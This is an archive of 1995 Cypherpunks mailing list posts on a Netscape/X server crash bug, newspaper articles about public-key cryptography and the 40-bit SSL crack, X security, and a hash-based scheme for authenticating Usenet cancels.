Date: Tue, 3 Oct 95 18:41:44 PDT
To: cypherpunks@toad.com
Subject: HUL_loo
Message-ID: <199510040141.VAA00105@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Economist of September 30-October 6 has a long survey
   of global telecommunications, excellently researched
   and written:

      The death of distance as a determinant of the cost of
      communications will probably be the single most
      important economic force shaping society in the first
      half of the next century. It will alter, in ways that
      are only dimly imaginable, decisions about where people
      live and work; concepts of national borders; patterns of
      international trade. Its effects will be as pervasive as
      those of the discovery of electricity.


   Buy it, see it at http://www.economist.com, or, in a pinch:


   HUL_loo  (92 kb in 6 parts)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 3 Oct 95 23:13:45 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510031438.HAA06918@orac.engr.sgi.com>
Message-ID: <199510040204.WAA22162@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> In article <DFv6uo.4so@sgi.sgi.com>, Ray Cromwell <rjc@clark.net> writes:
> 
> > This bug doesn't seem to crash Netscape, instead, it crashes my XServer
> > as soon as the mail window pops op. I'm too tired right now to try to
> > analyze it, but it might be another stack bug, this time, in the X
> > libraries because Netscape isn't doing any sanity checking.
> 
> This is a bug in your X server, not in netscape.  The X server should
> never crash no matter what you send to it.

  That's true, but it is also true that Netscape should also be
performing some sanity checking on input rather than relying on 
the supporting libraries to be secure. Remember, a hole is a hole.
The last sendmail bug was a buffer overflow in syslog, however,
sendmail still got patched to do bounds checking on the strings
it was passing to syslog. 

  It looks like this is only bug on BSDI2.0/XAccel, and NT3.5/NS1.1. But
is it wise for netscape to be sending 10,000 character strings to GUI
functions anyway? 

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 3 Oct 95 19:25:17 PDT
To: jya@pipeline.com (John Young)
Subject: Re: HUL_loo
In-Reply-To: <199510040141.VAA00105@pipe3.nyc.pipeline.com>
Message-ID: <9510040222.AA12001@all.net>
MIME-Version: 1.0
Content-Type: text


> 
>    The Economist of September 30-October 6 has a long survey
>    of global telecommunications, excellently researched
>    and written:
> 
>       The death of distance as a determinant of the cost of
>       communications will probably be the single most
>       important economic force shaping society in the first
>       half of the next century. It will alter, in ways that
>       are only dimly imaginable, decisions about where people
>       live and work; concepts of national borders; patterns of
>       international trade. Its effects will be as pervasive as
>       those of the discovery of electricity.

Sounds like an extract from the first chapter of my recent book:
	"Protection and Security on the Information Superhighway"


-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 3 Oct 95 20:30:54 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: NYT: WWW Usage Monitoring for Marketing
Message-ID: <199510040330.XAA31167@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


New York Times, National Edition, 95/10/03:

A positive sign in the marketing/privacy war on the net:

In his regular Advertising column, Stuart Elliott discusses the presentation
of a report on the problem of "assuring accurate and comprehensive measurement
of consumer exposure to advertisements that appear in interactive media like
World Wide Web sites and on-line services."

The report was issued by "Casie", the Coalition for Advertising Supported
Information and Entertainment, a creation of two main advertising trade 
groups: the American Assn. of Advertising Agencies, and the Assn. of Nat'l.
Advertisers.

Elliott's article identifies three main issues covered in the report. One of
these is privacy:

	"Every effort should be made to maintain consumers' privacy,"
	the report urges, adding that identities of computer users 
	"must not be revealed by audience measurement providers."

-Futplex <futplex@pseudonym.com>
If you haven't seen the film "Twelve Angry Men", it's about time you did.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Tue, 3 Oct 95 20:55:11 PDT
To: List <cypherpunks@toad.com>
Subject: Article requests
Message-ID: <Pine.OSF.3.91.951003235406.13722D-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


I have received many requests for the articles that I wrote on 
Cryptography so I will post them to the list with the subject "ARTICLES"
 
Regards, Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Tue, 3 Oct 95 20:57:47 PDT
To: List <cypherpunks@toad.com>
Subject: ARTICLES
Message-ID: <Pine.OSF.3.91.951003235732.13722E-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Copyright (C) 1995 
Tim Philp 
Brantford, Ontario 
Canada     
 
Article appeared in The Expositor, Brantford, Ont., Canada 
June 10th, 1995 
 
	 -  COMPUTER CRYPTOGRAPHY - 
	 - PROTECTING YOUR PRIVACY - 
	           by 
		Tim Philp 
 
	Last week I discussed ways that the computer has 
made our lives less private. Today we take up that thread and 
talk about the stuff of spy novels.Cryptography, in the context 
that we are discussing it, is a means of preventing 
unauthorized people from reading our files or correspondence. 
Cryptography is not new. It has been used throughout history 
and has played its part in shaping events. Mary Queen of Scots 
was beheaded because the cipher that she used to arrange a 
rebellion against Elizabeth I was decoded by the government. 
	Julius Caesar used a primitive cipher, now known as a 
Caesar Cipher, to disguise his messages to Rome during his 
military campaigns. Every letter in his messages was replaced 
by the letter three letters farther in the alphabet. Thus A would 
become D, B would become E, until you reached the end of the 
alphabet. You would then wrap around to make X equal to A, 
Y equal to B and Z equal to C. In this way the word CAESAR 
would become FDHVDU. Simple substitution ciphers like this 
one are easily broken and today are used in puzzle books to 
provide a few moments diversion to puzzle fanciers. 
	The role of computers in cryptography goes back to 
the early days of computers. One of the first computers was 
used to help decode enemy messages in England during the 
second world war. The 'boffins of Bletchley' were the true 
progenitors of the computer, not IBM. 
	Cryptography has progressed far beyond the simple 
Caesar Cipher. Indeed, today's methods of encoding messages 
have progressed to the point where the ciphers are unbreakable 
within any reasonable amount of effort. It does no good to 
break a cipher if it takes 1500 years of computer time to do it! 
	Of interest to computer users is the development of a 
type of cryptography called Public Key Cryptography. With 
this method you have two keys, a public key and a private key. 
Simply speaking, a key is a very long number that is used by 
your program to encode and decode messages. Each person 
that you want to communicate with has a public key that is 
published and is known by everyone.  
	To send a message to your friend you would use his 
public key to encode the message. Your friend receives the 
message and uses his private key to decode the message. 
	The beauty of this technique, is an eavesdropper can 
intercept the encoded message and the public key of the 
recipient, but he cannot use this information to decode the 
message without the secret key of the recipient. 
	In older systems you had to transmit the secret key to 
the recipient. The secret key could be intercepted and used to 
decode the messages. Public key systems require that only the 
public key be transmitted to the recipient. The message cannot 
be decoded using only the public key and the message. 
	The availability to the general public of secure, 
military grade cryptographic methods has generated 
considerable controversy. The US government has placed this 
software under export control and has suggested the use of 
their own system called Clipper. Clipper has a 'backdoor' that 
will allow the government to decode secret messages. They 
claim that they need this power to combat drugs and crime. 
Civil libertarians claim that the government has no business 
intercepting private communications. 
	Cryptography can be used to protect E-Mail messages 
and computer files. The software to do this is freely available 
on the Internet (search for PGP). The US government, it 
seems, is locking the barn door after the horses have escaped. 
 
This file may not be reproduced by any means without the 
permission of the author 


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMHM8unseeMISF+fVAQFesQP/YxFgW3BAjnvDCMU4SfksgpKLEGMDMv9M
YQpn/0BqUZSUnO3yye1bIN5KsDofePaCd6PcE6RcnvZJTBVu9PiZvxiBkr/a76wf
5Ft+F4p2tH0gxPunXZyjDqEnfHDcXY+X0FM7JgmeMyjDxzbq6GIqEX7gLoPAszwp
Ayu4jIl2smg=
=76yF
-----END PGP SIGNATURE-----


===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Tue, 3 Oct 95 20:59:34 PDT
To: List <cypherpunks@toad.com>
Subject: ARTICLES
Message-ID: <Pine.OSF.3.91.951004000011.13722F-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Copyright (C) 1995 
Tim Philp 
Brantford, Ontario 
Canada     
 
Article appeared in The Expositor, Brantford, Ont., Canada 
Sept 9th, 1995 
 
		- THE CODEBREAKERS - 
	                 by 
		      Tim Philp 
	A couple of weeks ago an extraordinary event took 
place that has implications for all users of the Internet. A 
group on the Internet, who call themselves CYPHERpunks, 
ran a test of a code system that was considered uncrackable in 
any reasonable amount of time. This in itself was not the 
extraordinary event. This code was broken by the cypherpunks 
in only 31.5 HOURS! That's right, hours. This code, called 
SSL used a 40 bit encypherment key with  1,099,511,627,776 
possible combinations. 
	To give you an example of just how incredible this 
feat was, let's examine the security of this code. If you were to 
try 1 key per second it would take you just over 34,841 years to 
try them all. That is almost five times longer than all of 
recorded history. 
	How was this done and what does this mean to users 
of the Internet? The how part is simple to explain, the meaning 
will be more difficult to divine. 
	The security of a code must rely only upon the key 
used to encipher the plaintext. It is assumed that the method of 
encryption is well known, as indeed it would be if it were used 
in a commercial product. Someone would disassemble the code 
and figure out the method. It is for this reason that security 
cannot reside in a secret means of encypherment. SSL is one 
such code. 
	This group, the Cypherpunks, wrote a program that 
would try keys in sequence and then they distributed it to the 
Internet community. They then set up a central computer that 
people all over the world could call into and get assigned a 
group of keys to try. These people would then feed these keys 
into the code cracking program and report the results to the 
central computer.  
	With hundreds of users taking part, using computers 
that were sitting idle at nights running screen savers, they 
cracked the code in 31.5 hours. 
	One of the greatest arguments against people trying 
this kind of brute force attack on codes, is that the computer 
time and power required would cost the earth. In actual fact, 
this successful attack cost nothing at all as the computers used 
were sitting idle. 
	Everything from little 286 PCs to mini-computer 
workstations were pressed into service labouring long over the 
weekend tirelessly trying one possible key after another until 
they cracked the code. 
	Because this was an academic excersise, there was no 
harm done. The purpose was to prove how quickly a 40 bit 
code could be cracked. I confess to be astounded at just how 
fast this was accomplished. 
	This points out two remarkable possibilities for the 
new communications technology that we are only now 
beginning to use. If that code were protecting sensitive 
information, such as a bank funds transfer, this group could be 
very rich. 
	It does also point out a new way of using the Internet 
to solve problems that have long eluded solution because of the 
shear computational size of the problem.  
	If the problem were to be divided up into small 
chunks and given to hundreds of computers worldwide, 
solution may become possible. We are just beginning to 
understand the possibilities. 
 
This file may not be reproduced by any means without the 
permission of the author 


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMHM8znseeMISF+fVAQEGzgP+L+JQfTSZ1un83/oh2g/5Nthw3tiHVtb9
eDiOtuzvuQiLxMO/SUPnjM5cXlSYhTNCN8wF49IXEO5Istg58oIA8wf4MPr8aDML
dsK8h34rBQqVXjaxC9staKtKnTGLfZFLmKGwRShLJECgs6Bzqu25TptSYIa8RRGk
ncYhNj6Lalc=
=RE7O
-----END PGP SIGNATURE-----


===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 3 Oct 95 21:20:30 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
Message-ID: <9510040417.AA12468@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


You might want to look at BETSI which was created to do this kind of
thing, too.  Check out
    http://info.bellcore.com/BETSI/betsi.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Philipp <adam@powergrid.electriciti.com>
Date: Wed, 4 Oct 95 03:28:44 PDT
To: cypherpunks@toad.com
Subject: New Windoze PGP Shell (freeware)  worth checking out
Message-ID: <m0t0R8m-000HMgC@powergrid.electriciti.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

AEgis Research (who I know nothing about) has come out with a very pleasant
windows fron end for PGP. It is bone-head compliant, and even works well in
Win95. I'm only plugging because I was so impressed. Until Eudora has PGP
hooks, this is my shell of choice.

   Adam Philipp

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMHJgjm/ZTaRmpgTFAQGp+wf7BO36FpbAdLdDieORKldIe3MvPa8wUDpR
Rax38rxSP+aeR0toqtuldmWpfV5I+p40d+6pgWVfOKegS38Qt3k6rEt3r7C++Efi
PQZLOE3b4RHT5ZeS4klEZtwu1A8nTWMVZFkwcxTb6s+C3KYv9JxdXFHnrOPlnkcL
5AJhUDvznMnA1WhKmknNjXhGJH9FKtvNuTO/k1fmD6YwclqAbKBiuGwQduWqZfwI
0zGZlpSfbuZ6sCsbHFnw1wJIOONyAEr1dB5qhyV3rX00hm6KfSNsuGqwvlDhaOM9
lODlFwBVt+PJIRHVocCcCdp7/5ffE/hTIXoRNYYF0kcZTotJP05SXg==
=fvcQ
-----END PGP SIGNATURE-----

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|    http://www.rosa.com/~adam    |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA: Confidential,          |communications are preferred for   | 
|secret, not for publication.     |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 4 Oct 95 00:27:41 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510031438.HAA06918@orac.engr.sgi.com>
Message-ID: <44td0c$3um@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510040204.WAA22162@clark.net>, rjc@clark.net (Ray Cromwell) writes:
> > In article <DFv6uo.4so@sgi.sgi.com>, Ray Cromwell <rjc@clark.net> writes:
> > 
> > > This bug doesn't seem to crash Netscape, instead, it crashes my XServer
> > > as soon as the mail window pops op. I'm too tired right now to try to
> > > analyze it, but it might be another stack bug, this time, in the X
> > > libraries because Netscape isn't doing any sanity checking.
> > 
> > This is a bug in your X server, not in netscape.  The X server should
> > never crash no matter what you send to it.
> 
>   That's true, but it is also true that Netscape should also be
> performing some sanity checking on input rather than relying on 
> the supporting libraries to be secure. Remember, a hole is a hole.
> The last sendmail bug was a buffer overflow in syslog, however,
> sendmail still got patched to do bounds checking on the strings
> it was passing to syslog. 
> 
>   It looks like this is only bug on BSDI2.0/XAccel, and NT3.5/NS1.1. But
> is it wise for netscape to be sending 10,000 character strings to GUI
> functions anyway? 

  While I agree that we should probably truncate this string to something
smaller than 10000 characters(I've already filed a bug on it here), it
is perfectly legal X protocol to send 10,000 characters to the X server.
How do I decide what is too long?  For example, when tracking down buffer
overflow problems for the security patch, we found an undocumented
static buffer limit of 64 bytes for the hostname passed to gethostbyname()
on IRIX.  Before we stumbled across this problem, we had a discussion
about what length we should truncate host names to.  People thought
that 128 characters was a reasonable limit, but it turned out that it
was too long.

  If the X server crash is what I think it is, it could still be hit
if we limit the string length, depending on the user's font selections
in their .Xdefaults.

  The fact is that if we are passing documented legal values into X,
unix, windows, or some other system software, we may still tickle
some bug in the system.  We can't test against every patch level of
every piece of software that our code may run against.  If that code
crashes its a bug in that code, and there is little we can do about
it other than try to play by the documented rules.

  That said, there are probably still bugs in Netscape that will
cause it to crash.  We took care to try to find all such bugs that
occured on the stack, which could be used to insert code and
jump to it.  That was the best we could do in the timeframe of
the security patch.  For 2.0 we are doing complete code reviews
to look for any sort of overflows, stack or not, as well as other
latent bugs.  We are also beefing up our QA to try to find more
of these types of bugs.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Wed, 4 Oct 95 09:35:25 PDT
To: roy@cybrspc.mn.org
Subject: Re: About that simple hardware RNG
In-Reply-To: <951003.173054.7O1.rnr.w165w@cybrspc.mn.org>
Message-ID: <95Oct4.075144edt.1878@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> The idea:  noise from an avalanching diode is applied to the input of an
> 8 bit shift register.  The SR is clocked at some fairly high sampling
> rate.  The 8 bits are made available on the printer port.
The shift register and timer probably involves 2 microchips.  Why not just
use 8 avalanching diodes, one for each bit.  Infact, you can use 13 if you
use the other printer-port input lines.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 4 Oct 95 04:56:55 PDT
To: cypherpunks@toad.com
Subject: (fwd) ETO Trade Points : Correction
Message-ID: <v02120d02ac9826f42d2a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Wed, 4 Oct 95 07:49:16 -0400
From: "GORD JENKINS" <jenkins@fox.nstn.ca>
X-Minuet-Version: Minuet1.0_Beta_14.1
Reply-To: <JENKINS@fox.nstn.ca>
X-Popmail-Charset: English
To: www-buyinfo@allegra.att.com
Subject: ETO Trade Points : Correction


Subject: ETO Trade Points

I made a mistake in the Web site address.
The correct address is
 http://www.unicc.org/untpdc
Thanks
Gordon Jenkins
 --
 GORD JENKINS
e maik  JENKINS@fox.nstn.ca
tel 613 794 6735
fax 613 723 8938
------ Forwarded message ends here ------
 --
 GORD JENKINS
e maik  JENKINS@fox.nstn.ca
tel 613 794 6735
fax 613 723 8938

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 4 Oct 95 08:18:52 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510031438.HAA06918@orac.engr.sgi.com>
Message-ID: <199510041513.IAA01471@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510040204.WAA22162@clark.net>, Ray Cromwell <rjc@clark.net> writes:

>> This is a bug in your X server, not in netscape.  The X server should
>> never crash no matter what you send to it.

>   That's true, but it is also true that Netscape should also be
> performing some sanity checking on input rather than relying on 
> the supporting libraries to be secure. Remember, a hole is a hole.
> The last sendmail bug was a buffer overflow in syslog, however,
> sendmail still got patched to do bounds checking on the strings
> it was passing to syslog. 

>   It looks like this is only bug on BSDI2.0/XAccel, and NT3.5/NS1.1. But
> is it wise for netscape to be sending 10,000 character strings to GUI
> functions anyway? 

It's absolutely okay for netscape to send long character strings to the
X server.  In fact, all it's probably doing is putting long character
strings into a Motif widget, which then sends them to the X server.
This is also totally okay.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schampeo@nando.net (Steve Champeon)
Date: Wed, 4 Oct 95 05:57:19 PDT
To: cypherpunks@toad.com
Subject: TidBITS article on Netscape
Message-ID: <v02120d01ac98422061df@[205.139.212.66]>
MIME-Version: 1.0
Content-Type: text/plain



Geoff Duncan has written an article about the Netscape security
breach in TidBITS, an e-zine for Mac owners. Copies are available
at: 

ftp://ftp.tidbits.com/pub/tidbits/issues/1995/TidBITS#297_02-Oct-95.etx

The above version is formatted using Setext. HTML and text/plain
versions are also available. Mr. Young? Perhaps this could go into
the library?

Seems fair, if critical, and c2.org gets a mention. 

Steve







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 4 Oct 95 06:03:22 PDT
To: cypherpunks@toad.com
Subject: Telecommana
Message-ID: <199510041303.JAA00417@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-4-95.

   Jared Sandberg writes in The WSJ on a new Internet payment
   system by MasterCard, IBM, Netscape, CyberCash and GTE.
   Says the specs were published yesterday.

   Another WSJ report is on Lockheed Martin's proposal for a
   new communications satellite system.

   John Markoff writes in The NYT on AT&T's proposed new 12-
   satellites system. $ for Qualcomm.

   Another NYT piece is about "naysayers" of satellite
   services.

   And, Financial Times has a bountiful insert on Information
   Technology, with a lead story on Internet security, black-
   hearted hacking and, to the rescue, princely encryption and
   authentication. Or is the blanco prince a negro hacker?

   All these bleating for mana at Telecom 95 manana in gelt-
   berotten Geneva.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 4 Oct 95 06:56:34 PDT
To: cypherpunks@toad.com
Subject: Re: New Windoze PGP Shell (freeware)  worth checking out
Message-ID: <9509048128.AA812821174@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     On October 4, 1995,
     Adam Philipp <adam@powergrid.electriciti.com> at Internet-USA
     wrote:
     
     AEgis Research (who I know nothing about) has come out with a very 
     pleasant windows fron end for PGP. It is bone-head compliant...
     
     LYCOS had 1 entry for AEgis Research, but that page could not be found 
     on the cited server.
     
     Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 4 Oct 95 01:45:49 PDT
To: norm@netcom.com (Norman Hardy)
Subject: Re: The Evolution of Cooperation (Towards a mathematical theory of reputation?)
In-Reply-To: <ac97b7d503021004c5f9@DialupEudora>
Message-ID: <199510040842.JAA16000@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| I highly recommend Axelrod's short book, The Evolution of  Cooperation, for
| those (like me) who find it hard to think clearly about trust issues. You
| have probably heard about prisoner's dilemma, tit-for-tat etc. Axelrod is a
| very early worker in this field. He set up a tournament of programmed bugs
| that competed with each other in an artificial environment. They could
| survive only by cooperation with other bugs. The could also cheat.

I vaguely remember that Axelrod did a few interesting additional papers,
on things like geographical propagation of knowledge in iterated 
prisoner's dilemma, and of behaviour in which the 'bugs' had limited memory
as well.

Very interesting reading, I'd say. Do anyone know what he have done recently?

-Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Wed, 4 Oct 95 07:50:54 PDT
To: Christian Wettergren <cwe@it.kth.se>
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <199510041102.MAA17689@piraya.electrum.kth.se>
Message-ID: <9510040947.ZM16462@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


good points, Christian!

more and more, networks are becoming flooded with X traffic.  although X
has always been known to be a potential security hole, i think X-attacks
are going to increase dramatically in the coming months.

i commonly hear of sights with Xauthority enabled, only to have the user
community type "xhost +" at the prompt.  bad karma.  the days of pumping
rude & crass noises to someone else's workstation will soon graduate to
more nefarious and insidious attacks.

is anyone looking into a means of securing X (above and beyond the current
weak solutions)?

regards,
--robert
--

o  robert owen thomas: unix consultant. cymro ydw i. user scratching post.  o
o       e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com        o
o               vox:  708.435.7076   fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Wed, 4 Oct 95 07:24:48 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Web "places" and the media monsters
In-Reply-To: <199509292319.QAA21372@netcom10.netcom.com>
Message-ID: <Pine.3.89.9510041010.A16263-0100000@echonyc>
MIME-Version: 1.0
Content-Type: text/plain


A tiny correction to Vladimir's interesting posting. It wasn't J.Gilmore 
I quoted on the "Titanic deck chair" in the NY Times, it was J.Barlow, 
who indeed has a propensity for soundbyte. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 4 Oct 95 12:47:47 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <modemacDFr0qB.IyK@netcom.com>
Message-ID: <V0BgcD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


[alt.religion.scientology restored, since that's where most of the discussion
of forged cancels has been taking place so far ]

In article <44pmiq$h7t@segfault.monkeys.com>, rfg@monkeys.com (Ronald F. Guilmette) writes:

>In my opinion, the simple, obvious, and correct solution (which should have
>been implemented from day one, IMHO) is to modify the currently prevalent
>news processing packages (i.e. INN and Cnews) so that rather than physically
>removing canceled news article files from the directories where they exist,
>they are instead edited (by INN and/or Cnews) in place, and retained for
>future reference.

Because of the prevalence of forged cancels, my site just ignores all cancels.
Unfortunately, most other sites, including our feeds, honor forged cancels.

[Good suggestions skipped]

>Bottom line:  Article cancelations are known to be based upon highly in-
>secure mechanisms.  Forged cancels are becoming more common.  Many of
>these are desirable deletions of spam.  Others are problematic instances
>of untrustworthy individuals attempting to act as unelected news admini-
>strators for the entire Internet.  Until such time as more secure article
>cancelation mechanisms are put in place (and perhaps even afterwards)
>mechanisms which provide for the retention of adequate audit trails
>relating to canceled articles should be created and widely adopted.
>The current approach/convention/solution/mechanism of physically *deleting*
>an article file whenever _anybody_ on the world-wide Internet tells your
>news system to do so is simply not acceptable.

The cancellation mechanism described in RFC 1036 does not use digital
signatures, but is based on the honor system. RFC 1036 says in section 3.1:
"Only the author of the message or the local news administrator is allowed to
send this message." However no mechanism is provided to authenticate the origin
of a cancel. Of late, a small group of control freaks has abused this security
hole, claiming (with no basis in reality) that some sort of consensus permits
them to act as the self-appointed judges of the contents of other people's
Usenet articles, to impersonate other posters, and to distribute forged cancels
to other sites to censor the offending articles. E.g., one graduate student at
Lehigh University falsely claims to be a sysadmin and regularly forges cancels
for articles in n.a.n-a.m critical of his forgeries and other net-abuse; and
a crtiminal cult has been forging cancels for articles discussing its dogmas.

I'd like to remind everyone of the well-thought-out scheme for authenticating
cancels proposed some time ago by Taneli Hujskonen and Benjamin Franz, that can
also be integrated into a Lazarus-like system for tracing forged cancels.

Let H denote a one-way hash function (also known as message digest), such as
Ron Rivest's MD5 or Ralph Merkle's Snerfu. Efficient source code to compute
them is readily available and not subject to export restrictions, unlike PGP.
Such functions have the property that's it's easy (for a computer) to compute
M = H(N), but, for a given M, it's intractable to find N such that M = H(N).


Let the poster specify a secret passphrase whenever s/he posts an article.
This passphrase will be required to cancel the article. However it will not be
revealed by a cancel and can be reused. With user-friendly software, the
poster might store the passphrase in a profile and use the same passphrase for
all articles, or change it for every message.

When an article is posted, two quantities are computed by the posting program:
M1 = H(article body + newsgroups + message-id + date + passphrase) and
M2 = H(M1). The posted article contains the header "Cancel-lock: M2".

When an attempt is made to cancel/supersede an article X with a "Cancel-lock:"
header, the user is asked to supply the passphrase. The posting software
computes M1 = H(X's body + newsgroups + X's message-id + date + passphrase)
once again and adds the "Cancel-key: M1" header to the article containing
"Control: cancel <X>" or "Supersedes: <X>" that's being posted.

(Note that without knowing the passphrase it's intractable to match the M1.)


Whenever news server software (such as inn) detects either "Control: cancel
<X>" or "Supersedes: <X>", INN should retrieve the original article <X> and
looks for the "Cancel-lock: M2" header. If one is found, then the old article
may be cancelled only if the new article contains the header "Cancel-key: M1"
such that H(M1) = M2.

If the cancel cannot be authenticated (e.g., because the original article lacks
the "Cancel-lock: M2" header, or the cancel lacks the "Cancel-key: M1" header
such that H(M1)=M2), then INN should forward the unauthenticated cancel to one
or more "collection centers" so the author of the original article may be
notified.

A site may choose to honor the unauthenticated cancel anyway if the article
being cancelled lacks the "Cancel-lock: M2" header, but should ignore it if
"Cancel-lock:" is found, but no matching "Cancel-key:" is given.


Each "collection center" deamon should wake up periodically (say, every hour),
group the collected unauthenticated cancels by message-ids of the cancelled
articles, and e-mail the (distinct) addresses (other than "usenet@*" or
"news@*") mentioned in the "From:", "Sender:", "Authorized:", and
"X-Cancelled-By:" headers, quoting the unauthenticated cancel and the Path's as
seen at many different sites that forwarded the cancels. This way, if the
unauthenticated cancel is indeed forged, its author will see within hours that
it has been fraudulently cancelled _and_ will automatically receive enough
"Path:" samples from all over the world to see where it was posted, by
comparing the "Path:" headers in several forwarded copies.


A user or an entire site can easily "opt out" of havings "bona fide" cancels
reported by always using the proposed "Cancel-lock:/Cancel-Key:" headers.

This scheme would be upwardly compatible with all existing Usenet software.
It would also be compatible with the "NoCeM" proposal, where trusted censors
could issue digitally signed "advisory cancels" without impersonating the
original posters. Such advisory cancels would not be subject to hash checks.


---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlsiil@attmail.com (Karl A Siil)
Date: Wed, 4 Oct 95 14:21:52 PDT
To: cypherpunks@toad.com
